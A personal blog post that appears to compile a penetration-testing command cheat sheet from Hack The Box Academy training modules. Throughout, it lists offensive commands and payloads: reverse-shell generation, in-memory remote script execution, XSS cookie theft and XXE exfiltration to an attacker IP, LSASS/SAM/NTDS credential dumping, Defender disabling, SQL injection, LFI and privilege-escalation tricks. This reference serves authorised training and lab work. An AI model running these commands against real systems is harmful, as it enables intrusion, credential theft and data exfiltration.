Hack The Box Academy – Penetration Tester Job Role Path
Overview
Between May and September 2025, I completed the Hack The Box Academy Penetration Tester Job Role Path in just under five months.
This structured learning path is designed to build both foundational and intermediate penetration testing skills, aligned with the real-world workflow of a professional pentester.
The path includes 28 modules, progressing from fundamental networking and web application concepts to more advanced exploitation, privilege escalation, and Active Directory attacks.
It closely follows the PTES methodology (Pre-engagement → Information Gathering → Vulnerability Assessment → Exploitation → Post-Exploitation → Reporting) and directly prepares students for the HTB Certified Penetration Testing Specialist (HTB CPTS) certification.
Objectives & Skills Covered
Throughout the path, I strengthened a wide range of technical and methodological skills, including:
- ✅ Understanding the penetration testing process and methodology
- 🌐 Conducting reconnaissance and footprinting using both passive and active techniques
- 🧭 Performing network enumeration with tools such as Nmap and manual scanning
- 🔍 Performing web application reconnaissance and analyzing HTTP requests/responses
- 🧱 Identifying and exploiting common vulnerabilities in services and web apps
- 💻 Executing Windows and Linux privilege escalation
- 🔄 Performing pivoting and tunneling across segmented networks
- 🧠 Building a solid understanding of Active Directory environments and attack vectors
- 🧾 Documenting findings and writing professional pentest reports
- 🧰 Using and combining key tools:
nmap, curl, enum4linux, netcat, smbclient, sqlmap, hydra, chisel, and many others
About This Cheat Sheet
As I progressed through each module, I took extensive notes and collected the most useful commands, tips, and workflows.
This page serves as a centralized reference for :
🔹 Quickly recalling common pentesting commands
🔹 Revisiting useful techniques learned across the modules
🔹 Supporting future labs, writeups, and real-world engagements
Even beyond the Penetration Tester Path, this cheat sheet can be valuable for CTFs, home labs, and red/purple team exercises.
🧠 This post is not a tutorial or a walkthrough of the path, but a personal reference and summary of key tools and commands learned throughout the journey.
💡 This cheat sheet consolidates and expands on the individual command references and exercises from the official Hack The Box Academy modules within the Penetration Tester Job Role Path.
It serves as a unified, practical reference for quick recall during labs, reviews, or real-world engagements.
📚 Penetration Tester Path – Command Reference Cheat Sheet
This section summarizes the key commands and techniques I used throughout the HTB Academy Penetration Tester Job Role Path, organized by module.
Each command includes a short description to help quickly recall its purpose.
🧱 Fundamentals
🧭 Penetration Testing Process
Understand the overall methodology (no specific commands required here, mostly conceptual).
💻 Linux Fundamentals
1
2
3
4
5
6
| pwd # Print working directory
ls -la # List files with details
cat /etc/passwd # View user accounts
grep -R "pattern" /path # Search recursively for a string
find / -type f -name "file.txt" 2>/dev/null # Search files by name
chmod +x script.sh # Add execute permissions
|
🪟 Windows Fundamentals
1
2
3
4
5
| whoami # Current user
systeminfo # System info
net user # List users
net localgroup administrators # Check admin group
tasklist # Running processes
|
🌐 Introduction to Web Applications / Web Requests
1
2
3
| curl -I http://target # Send HEAD request
curl -v http://target # Verbose request, show headers
wget http://target/file # Download file
|
🌐 Network Enumeration with NMAP
💡 Scanning options
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| -sn # Disables port scanning
-Pn # Disables ICMP Echo Requests
-PE # Performs the ping scan by using ICMP Echo Requests against the target
-p- # Scan all ports
-p21-443 # Scan all ports between 21 and 443.
-p25,110,143 # Scans only the specified ports 25, 110 and 143
-F # Scans top 100 ports
-sS # Performs an TCP SYN-Scan
-sA # Performs an TCP ACK-Scan
-sU # Performs an UDP Scan
-sV # Scans the discovered services for their versions
-sC # Perform a Script Scan with scripts that are categorized as "default"
--script <script> # Performs a Script Scan by using the specified scripts (malware, vuln, exploit, discovery, fuzzer, ...)
-O # Performs an OS Detection Scan to determine the OS of the target
-A # Performs OS Detection, Service Detection, and traceroute scans
-D RND:5 # Sets the number of random Decoys that will be used to scan the target
-S 10.10.XXX.XXX # Specifies the source IP address for the scan
--disable-arp-ping # Disables ARP Ping Requests
--packet-trace # Shows all packets sent and received
|
1
2
3
| -T <0-5> # Specifies the specific timing template
-v/-vv # Displays verbose output during the scan
--min-rate # Sets the number of packets that will be sent simultaneously
|
👾 SMB
1
2
3
4
5
6
7
8
| smbclient -N -L //<IP> # Null session authentication on SMB
smbclient //<IP>/<share> # Connect to a specific SMB share
rpcclient -U "" <IP> # Interaction with the target using RPC
smbmap -H <IP> # Enumerating SMB shares
smbmap -H <IP> -r <share> # Recursive network share enumeration using smbmap
smbmap -H <IP> --download "share\file.txt" # Download a specific file from the shared folder
crackmapexec smb <IP> --shares-u '' -p # Enumerating SMB shares using null session authentication.
enum4linux <IP> -A # SMB enumeration using enum4linux
|
💿 NFS
1
2
3
| showmount -e <IP> # Show available NFS shares
mount -t nfs <IP>:/<share> ./target-NFS/ -o nolock # Mount the specific NFS share to ./target-NFS
umount ./target-NFS # Unmount the specific NFS share
|
🌐 DNS
1
2
3
4
| dig ns <domain.tld> @<nameserver> # NS request to the specific nameserver
dig any <domain.tld> @<nameserver> # ANY request to the specific nameserver
dig axfr <domain.tld> @<nameserver> # AXFR request to the specific nameserver
dnsenum --dnsserver <nameserver> --enum -p 0 -s 0 -o found_subdomains.txt -f ~/subdomains.list <domain.tld> # Subdomain brute forcing
|
📩 IMAP/POP3
1
2
| curl -k 'imaps://<FQDN/IP>' --user <user>:<password> # Log in to the IMAPS service using cURL
openssl s_client -connect <IP>:<imaps/pop3s> # Connect to the IMAPS/POP3S service
|
💻 SNMP
1
2
3
| snmpwalk -v2c -c <community string> <IP> # Querying OIDs using snmpwalk
onesixtyone -c community-strings.list <IP> # Bruteforcing community strings of the SNMP service
braa <community string>@<IP>:.1.* # Bruteforcing SNMP service OIDs
|
🐬 MySQL
1
| mysql -u <user> -p<password> -h <IP> # Login to the MySQL server
|
🖥️ MSSQL
1
| mssqlclient.py <user>@<IP> -windows-auth # Log in to the MSSQL server using Windows authentication
|
🛠️ Windows Remote Management
1
2
3
| xfreerdp /u:<user> /p:"<password>" /v:<IP> /drive:shares,/tmp/shares # Log in to the RDP server from Linux with a share folder
evil-winrm -i <IP> -u <user> -p <password> # Log in to the WinRM server
wmiexec.py <user>:"<password>"@<IP> "<system command>" # Execute command using the WMI service
|
✉️ File Transfers
1
2
3
4
5
6
7
8
| Invoke-WebRequest -Uri https://<snip>/file.ps1 -OutFile file.ps1 # Download a file with PowerShell
IEX (New-Object Net.WebClient).DownloadString('https://<snip>/file.ps1') # Execute a file in memory using PowerShell
certutil.exe -verifyctl -split -f http://<IP>/file.exe # Download a file using Certutil
wget https://<snip>/file.sh -O /tmp/file.sh # Download a file using Wget
curl -o /tmp/file.sh https://<snip>/file.ps1 # Download a file using cURL
scp C:\Temp\upload.zip user@<IP>:/tmp/uploaded.zip # Upload a file using SCP
scp user@target:/tmp/download.exe C:\Temp\downloaded.exe # Download a file using SCP
python3 smbserver.py -smb2support <shareName> /home/<nameofuser>/Documents/ # Launches smbserver.py to host a share on the attacker Linux box for receiving files from the target
|
💣 Shells & Payloads
1
2
3
4
5
6
7
8
9
10
| Set-MpPreference -DisableRealtimeMonitoring $true # Powershell command using to disable real time monitoring in Windows Defender
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > nameoffile.elf # MSFvenom command used to generate a linux-based reverse shell stageless payload
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > nameoffile.exe # MSFvenom command used to generate a Windows-based reverse shell stageless payload
python3 -c 'import pty; pty.spawn("/bin/bash")' # Upgrade shell
/bin/sh -i # Spawns an interactive shell on a linux-based system
perl —e 'exec "/bin/sh";' # Uses perl to spawn an interactive shell on a linux-based system
ruby: exec "/bin/sh" # Uses ruby to spawn an interactive shell on a linux-based system
Lua: os.execute('/bin/sh') # Uses Lua to spawn an interactive shell on a linux-based system
awk 'BEGIN {system("/bin/sh")}' # Uses awk command to spawn an interactive shell on a linux-based system
vim -c ':!/bin/sh' # Uses the text editor VIM to spawn an interactive shell. Can be used to escape "jail shells"
|
💥 Password attacks
🧾 Password mutations & custom wordlists
1
2
3
| cewl https://<snip>.com -d 1 -m 3 --lowercase -w custom.wordlist # Uses cewl to generate a wordlist based on keywords present on a website
hashcat --force custom.wordlist -r custom.rule --stdout > mut_password.list # Uses Hashcat to generate a rule-based word list
./username-anarchy -i /path/to/listoffirstandlastnames.txt # Users username-anarchy tool in conjunction with a pre-made list of first and last names to generate a list of potential username
|
🔐 Remote Password Attacks
1
2
3
4
5
6
| netexec winrm <ip> -u user.list -p password.list # Uses Netexec over WinRM to attempt to brute force user names and passwords specified hosted on a target
netexec smb <ip> -u "user" -p "password" --shares # Uses Netexec to enumerate smb shares on a target using a specified set of credentials
netexec smb <ip> --local-auth-u <username> -p <password> --sam # Uses Netexec in conjunction with admin credentials to dump password hashes stored in SAM, over the network
netexec smb <ip> --local-auth-u <username> -p <password> --lsa # Uses Netexec in conjunction with admin credentials to dump lsa secrets, over the network. It is possible to get clear-text credentials this way
netexec smb <ip> -u <username> -p <password> --ntds # Uses Netexec in conjunction with admin credentials to dump hashes from the ntds file over a network
./Pcredz -f demo.pcapng -t -v # Extract credentials a network packet capture
|
💻 Windows Local Password Attacks
1
2
3
4
5
6
7
8
9
10
11
| findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml # Search for the string "password" in many different file type
Get-Process lsass # Shows LSASS process details in PowerShell — useful for preparing an LSASS memory dump
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 346 C:\lsass.dmp full # Uses rundll32 in Windows to create a LSASS memory dump file. This file can then be transferred to an attack box to extract credentials
pypykatz lsa minidump /path/to/lsassdumpfile # Uses Pypykatz to parse and attempt to extract credentials & password hashes from an LSASS process memory dump file
reg.exe save hklm\sam C:\sam.save # Uses reg.exe in Windows to save a copy of a registry hive at a specified location on the file system. It can be used to make copies of any registry hive (i.e., hklm\sam, hklm\security, hklm\system)
python3 secretsdump.py -sam sam.save -security security.save system system.save LOCAL # Uses Secretsdump.py to dump password hashes from the SAM database
vssadmin CREATE SHADOW /For=C: # Uses Windows command line based tool vssadmin to create a volume shadow copy for C:. This can be used to make a copy of NTDS.dit safely.
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit # Uses Windows command line based tool copy to create a copy of NTDS.dit for a volume shadow copy of C:
cmdkey /list # Enumerate credentials stored in the current user's profile
runas /savecred /user:<username> cmd # Launch a new instance of cmd.exe while impersonating a stored user
snaffler.exe -s # Search network shares for interesting files and credentials
|
🔍 Cracking Passwords
1
2
3
| hashcat -m 1000 dumpedhashes.txt /usr/share/wordlists/rockyou.txt # Uses Hashcat to crack NTLM hashes using a specified wordlist
unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes # Uses unshadow to combine data from passwd.bak and shadow.bk into one single file to prepare for cracking
zip2john ZIP.zip > zip.hash # Runs Zip2john against a zip file to generate a hash, then adds that hash to a file called zip.hash
|
🔄 Pivoting
1
2
3
| ssh -D 9050 user@<DMZ01> # Creates a local SOCKS proxy (localhost:9050) via SSH to DMZ01.
sudo vim /etc/proxychains.conf # Open the ProxyChains config in vim and ensure socks4 127.0.0.1 9050 is listed under the [ProxyList]
sudo proxychains -q nmap -sT -Pn 172.16.119.13 --open # Performs an Nmap TCP scan (-sT) routed through ProxyChains via the SOCKS proxy for internal reconnaissance
|
Back to top ↑
🌐 Attacking Common Services
📁 Attacking FTP
1
2
| ftp <IP> # Connects to an FTP server using the ftp client, supports anonymous logon or authenticated access.
hydra -l user1 -P /usr/share/wordlists/rockyou.txt ftp://<IP> # Brute-forcing the FTP service
|
👾 SMB
1
2
3
4
5
6
7
| crackmapexec smb <IP> -u /tmp/userlist.txt -p <password> # Password spraying against different users from a list
impacket-psexec <username>:'<password>'@<IP> # Connect to the SMB service using the impacket-psexec
crackmapexec smb <IP> -u <username> -p '<password>' -x 'whoami' --exec-method smbexec # Execute a command over the SMB service using crackmapexec
crackmapexec smb <IP> -u <username> -p '<password>' --sam # Extract hashes from the SAM database
crackmapexec smb <IP> -u <username> -H <hash> # Use the Pass-The-Hash technique to authenticate on the target host
impacket-ntlmrelayx --no-http-server -smb2support -t <IP> # Dump the SAM database using impacket-ntlmrelayx
impacket-ntlmrelayx --no-http-server -smb2support -t <IP> -c 'powershell -e <base64 reverse shell>' # Execute a PowerShell based reverse shell using impacket ntlmrelayx
|
💾 Attacking SQL Databases
1
2
3
4
5
6
7
8
9
10
| sqlcmd> EXECUTE sp_configure 'show advanced options', 1 # To allow advanced options to be changed
sqlcmd> EXECUTE sp_configure 'xp_cmdshell', 1 # To enable the xp_cmdshell
sqlcmd> RECONFIGURE # To be used after each sp_configure command to apply the changes
sqlcmd> xp_cmdshell 'whoami' # Execute a system command from MSSQL server
mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php' # Create a file using MySQL
mysql> show variables like "secure_file_priv"; # Check if the the secure file privileges are empty to read locally stored files on the system
sqlcmd> SELECT * FROM OPENROWSET(BULKN'C:/Windows/System32/drivers/etc/hosts',SINGLE_CLOB) AS Contents # Read local files in MSSQL
mysql> select LOAD_FILE("/etc/passwd"); # Read local files in MySQL
sqlcmd> SELECT srvname, isremote FROM sysservers # Identify linked servers in MSSQL
sqlcmd> EXECUTE('select @@servername,@@version, system_user,is_srvrolemember(''sysadmin'')') AT[<linked server>] # Identify the user and its privileges used for the remote connection in MSSQL
|
🛠️ Attacking RDP
1
2
3
4
| crowbar -b rdp -s <IP>/32 -U users.txt -c '<password>' # Password spraying against the RDP service
hydra -L usernames.txt -p '<password>' <IP> rdp # Brute-forcing the RDP service
tscon \#{TARGET_SESSION_ID} /dest:\#{OUR_SESSION_NAME} # Impersonate a user without its password
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f # Enable "Restricted Admin Mode" on the target Windows host.
|
🌐 Attacking DNS
1
2
| dig AXFR @<nameserver> <domain.tld> # Attempts an AXFR zone transfer from a specified nameserver
subfinder -d <domain.tld> -v # Brute-forcing subdomains
|
📧 Attacking Email Services
1
2
3
4
| host -t MX <domain.tld> # DNS lookup for mailservers for the specified domain
telnet <IP> 25 # Connect to the SMTP server
smtp-user-enum -M RCPT -U userlist.txt -D <domain.tld> -t <IP> # SMTP user enumeration using the RCPT command against the specified host
python3 o365spray.py --validate --domain <domain.tdl> # Verify the usage of Office365 for the specified domain
|
🔄 Pivoting, Tunneling, and Port Forwarding
1
2
3
4
5
6
7
| ssh -L 1234:localhost:3306 <username>@<IP> # Creates an SSH tunnel forwarding local port 1234 to remote localhost:3306 via <username>@<IP>
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:80 <username>@<IP> -vN # Creates a reverse SSH tunnel: attack-host:8080 → target:80
msf6> run post/multi/gather/ping_sweep
RHOSTS=<IP>/<CIDR> # Metasploit command that runs a ping sweep module against the specified network segment
for i in {1..254} ;do (ping -c 1 XXX.XXX.XXX.$i | grep "bytes from" &) ;done # For loop used on Linux to discover hosts in a given network segment
for /L %i in (1 1 254) do ping XXX.XXX.XXX.%i -n 1 -w 100 | find "Reply" # For loop used on Windows to discover hosts in a given network segment
1..254 | % {"172.16.5.$($_): $(Test-Connection count 1 -comp 172.15.5.$($_) -quiet)"} # PowerShell one-liner used to ping addresses 1 - 254 in the specified network segment
|
🛡️Active Directory Enumeration & Attacks
🔍 Initial Enumeration
1
2
3
| fping -asgq <IP>/<CIDR> # Performs a ping sweep on the specified network segment from a Linux-based host
sudo responder -I <interface> -A # Launches Responder in analyze mode on a specified network interface
./kerbrute_linux_amd64 userenum -d <DOMAIN> --dc <IP_DC> usernames.txt # Runs the Kerbrute tool to discover usernames in the domain specified
|
☠️ LLMNR/NTB-NS Poisoning
1
| Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y # Starts Inveigh on a Windows based host with LLMNR & NBNS spoofing enabled and outputs the results to a file
|
💣 Kerberoasting
1
2
3
4
5
6
| GetUserSPNs.py -dc-ip <IP_DC> <DOMAIN>/<username> # Impacket tool used to get a list of SPNs on the target Windows domain from a Linux-based host
GetUserSPNs.py -dc-ip <IP_DC> <DOMAIN>/<username> -request # Impacket tool used to download/request (request) all TGS tickets for offline processing from a Linux-based host
GetUserSPNs.py -dc-ip <IP_DC> <DOMAIN>/<username> -request-user <target_user> # Impacket tool used to download/request (request-user) a TGS ticket for a specific user account from a Linux-based host
setspn.exe -Q */* # Used to enumerate SPNs in a target Windows domain from a Windows based host
Import-Module .\PowerView.ps1 Get-DomainUser * -spn | select samaccountname # Uses PowerView tool to extract TGS Tickets
.\Rubeus.exe kerberoast /user:<username> /nowrap # Used to request/download a TGS ticket for a specific user the formats the output in an easy to view & crack manner (/nowrap)
|
💥ASREPRoasting
1
2
3
| Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | f1 # PowerView based tool used to search for the DONT_REQ_PREAUTH value across in user accounts in a target Windows domain
.\Rubeus.exe asreproast /user:<usernmae> /nowrap /format:hashcat # Uses Rubeus to perform an ASEP Roasting attack and formats the output for Hashcat
kerbrute userenum -d <DOMAIN> --dc <IP_DC> usernames.txt # Enumerates domain users and identifies accounts without Kerberos pre-auth
|
☁️ FFUF
1
2
3
4
5
6
7
8
9
| ffuf -h # ffuf help
ffuf -w wordlist.txt:FUZZ -u http://<IP>:<PORT>/FUZZ # Directory Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://<IP>:<PORT>/indexFUZZ # Extension Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://<IP>:<PORT>/blog/FUZZ.php # Page Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://<IP>:<PORT>/FUZZ -recursion -recursion-depth 1 -e .php -v # Recursive Fuzzing
ffuf -w wordlist.txt:FUZZ -u https://FUZZ.<domain.tld>/ # Sub-domain Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://<domain.tld>:<PORT>/ -H 'Host: FUZZ.<domain.tld>' -fs xxx # VHost Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://<domain.tld>:<PORT>/<snip>/index.php?FUZZ=key -fs xxx # Parameter Fuzzing - GET
ffuf -w wordlist.txt:FUZZ -u http://<domain.tld>:<PORT>/<snip>/index.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx # Parameter Fuzzing - POST
|
💉 SQL Injection Fundamentals
💉 SQLi
1
2
3
4
5
6
| admin' or '1'='1 # Basic Auth Bypass
admin')-- - # Basic Auth Bypass With comments
' order by 1-- - # Detect number of columns using order by
admin' UNION select 1,2,3-- - # Detect number of columns using Union injection
admin' UNION select 1,@@version,3,4-- - # Basic Union injection
UNION select username, 2, 3, 4 from passwords-- - # Union injection for 4 columns
|
🔍 DB enumeration
1
2
| admin' UNION select 1,database(),2,3-- - # Current database name
admin' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- - # List all databases
|
💥 Payload
1
2
3
| admin' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- - # List all tables in a specific database
admin' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- - # List all columns in a specific table
admin' UNION select 1, username, password, 4 from dev.credentials-- - # Dump data from a table in another database
|
🧠 Privileges
1
2
3
| cn' UNION SELECT 1, user(), 3, 4-- - # Find current user
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user=<username>-- - # Find if user has admin privileges
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- - # Find which directories can be accessed through MySQL
|
❌ Cross-Site Scripting (XSS)
1
2
3
4
5
| <script>alert(window.origin)</script> # Basic XSS Payload
<img src="" onerror=alert(window.origin)> # HTML-based XSS Payload
<script src="http://<OUR_IP>/script.js"></script> # Load remote script
<script>new Image().src='http://<OUR_IP>/index.php?c='+document.cookie</script> # Send Cookie details to us
python xsstrike.py -u "http://<IP>:<PORT>/index.php?task=test" # Run xsstrike on a url parameter
|
📁 Local File Inclusion (LFI)
1
2
3
4
5
6
7
8
| /index.php?language=/etc/passwd # Basic LFI
/index.php?language=../../../../etc/passwd # LFI with path traversal
/index.php?language=....//....//....//....//etc/passwd # Bypass basic
/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 # Bypass filters with URL encoding
/index.php?language=php://filter/read=convert.base64-encode/resource=config # Read PHP with base64 filter
/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id # RCE with data wrapper
curl -s "http://<IP>:<PORT>/index.php?language=expect://id" # RCE with expect wrapper
/index.php?language=http://<OUR_IP>:<PORT>/shell.php&cmd=id # Include remote PHP web shell
|
Back to top ↑
💉 Command Injection
| Injection Operator |
Injection Character |
URL-Encoded Character |
| Semicolon |
; |
%3b |
| New Line |
\n |
%0a |
| Background |
& |
%26 |
| Pipe |
| |
%7c |
| AND |
&& |
%26%26 |
| OR |
|| |
%7c%7c |
| Sub-Shell |
$() |
%24%28%29 |
| tabs |
|
%09 |
🐧 Linux
1
2
3
4
5
6
7
8
9
10
| ${IFS} # Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $())
{ls,-la} # Commas will be replaced with spaces
${PATH:0:1} # Will be replaced with
${LS_COLORS:10:1} # Will be replaced with ;
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") # Execute command regardless of cases
$(a="WhOaMi";printf %s "${a,,}") # Another variation of the technique
echo 'whoami' | rev # Reverse a string
$(rev<<<'imaohw') # Execute reversed command
echo -n 'cat /etc/passwd | grep 33' | base64 # Encode a string with base6
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) # Execute b64 encoded string
|
🪟 Windows
1
2
3
4
5
6
7
8
9
| Get-ChildItem Env: # Can be used to view all environment variables - (PowerShell)
%09 # Using tabs instead of spaces
%PROGRAMFILES:~10,-5% # Will be replaced with a space - (CMD)
$env:PROGRAMFILES[10] # Will be replaced with a space - (PowerShell)
%HOMEPATH:~0,-17% # Will be replaced with \ - (CMD)
$env:HOMEPATH[0] # Will be replaced with \ - (PowerShell)
iex "$('imaohw'[-1..-20] -join '')" # Execute reversed command
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami')) # Encode a string with base64
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))" #Execute b64 encoded string
|
📁 XXE
1
2
3
4
5
| <!ENTITY xxe SYSTEM "http://localhost/email.dtd"> # Define External Entity to a URL
<!ENTITY xxe SYSTEM "file:///etc/passwd"> # Define External Entity to a file path
<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php"> # Read PHP source code with base64 encode filter
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>"> # Reading a file through a PHP error
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://<OUR_IP>:8000/?content=%file;'>"> # Reading a file OOB exfiltration
|
🐧 Linux Privilege escalation
1
2
3
4
5
6
7
8
9
10
11
12
13
| ps aux | grep root # See processes running as root
ps au # See logged in users
sudo -l # Can the user run anything as another user ?
ls -la /etc/cron.daily # Check for daily Cron jobs
find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null # Find world-writeable directories
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null # Find world-writeable files
./pspy64 -pf -i 1000 # View running processes with pspy
find / -user root -perm -4000 -exec ls -ldb {}\; 2>/dev/null # Find binaries with the SUID bit set
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null # Find binaries with the SETGID bit set
PATH=.:${PATH} # Add a . to the beginning of the current user's PATH
ldd /bin/ls # View the shared objects required by a binary
sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart # Escalate privileges using LD_PRELOAD
./lynis # Audit system Perform a system audit with Lynis
|
🪟 Windows Privilege escalation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
| set # Display all environment variables
systeminfo # View detailed system configuration information
wmic qfe # Get patches and updates
wmic product get name # Get installed programs
tasklist /svc # Display running processes
query user # Get logged-in users
whoami /priv # View current user privileges
whoami /groups # View current user group information
net user # Get all system users
net localgroup # Get all system groups
net localgroup administrators # View details about a group
net accounts # Get passsword policy
netstat -ano # Display active network connections
procdump.exe -accepteula -ma lsass.exe lsass.dmp # Take memory dump with ProcDump
sekurlsa::minidump lsass.dmp and sekurlsa::logonpasswords # Use MimiKatz to extract credentials from LSASS memory dump
dir /q C:\backups\wwwroot\web.config # Checking ownership of a file
takeown /f C:\backups\wwwroot\web.config # Taking ownership of a file
icacls "C:\backups\wwwroot\web.config" /grant <username>:F # Modifying a file ACL
wevtutil qe Security /rd:true /f:text | Select-String "/user" # Searching security event logs
wevtutil qe Security /rd:true /f:text /r:<RemoteHost> /u:<username> /p:<password> | findstr "/user" # Passing credentials to wevtutil
msfvenom -p windows/x64/exec cmd='net group "domain admins" <usernmae> /add /domain' -f dll -o fake.dll # Generate malicious DLL
wmic useraccount where name="<username>" # Get sid Finding a user's SID
sc stop <service> # Stopping a service
sc start <service> # Starting a service
sc config AppReadiness binPath= "cmd /c net localgroup Administrators <username> /add" # Modifying a service binary path
rundll32 shell32.dll,Control_RunDLL C:\Users\<snip>\fake.dll # Executing custom dll with rundll32.exe
.\SharpUp.exe audit # Running SharpUp
icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe" # Checking service permissions with icacls
cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe" # Replace a service binary
gc (Get-PSReadLineOption).HistorySavePath # Reading PowerShell history file
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer # Query for always install elevated registry key (1)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer # Query for always install elevated registry key (2)
msfvenom -p windows/shell_reverse_tcp lhost=<OUR_IP> lport=<PORT> -f msi > fake.msi #Generate a malicious MSI package
msiexec /i c:\users\<snip>\fake.msi /quiet /qn /norestart # Executing an MSI package from command line
|
Back to top ↑
Below is a categorized list of the tools I used throughout the Hack The Box Penetration Tester Job Role Path, organized by purpose.
Each tool includes a short description and an official or GitHub link for quick reference.
🌐 Reconnaissance & Enumeration
💻 Web Application Testing
🧰 Exploitation & Post-Exploitation
🧱 Privilege Escalation & Local Enumeration
🧭 Active Directory & Lateral Movement
🧩 Pivoting, Tunneling & C2
📚 Resources
| Tool / Resource |
Purpose |
Link |
| GTFOBins |
Catalog of Unix binaries that can be abused for privilege escalation / bypasses |
gtfobins.github.io |
| LOLBAS |
Catalog of living-off-the-land binaries / scripts on Windows that can be abused |
lolbas-project.github.io |
Last updated: 2025-09-30
💡 Always verify tool legality and scope before usage. Prefer lab or authorized testing environments.
If you notice a missing tool or an outdated link, feel free to open an issue on the blog’s repo or contact me.
Back to top ↑
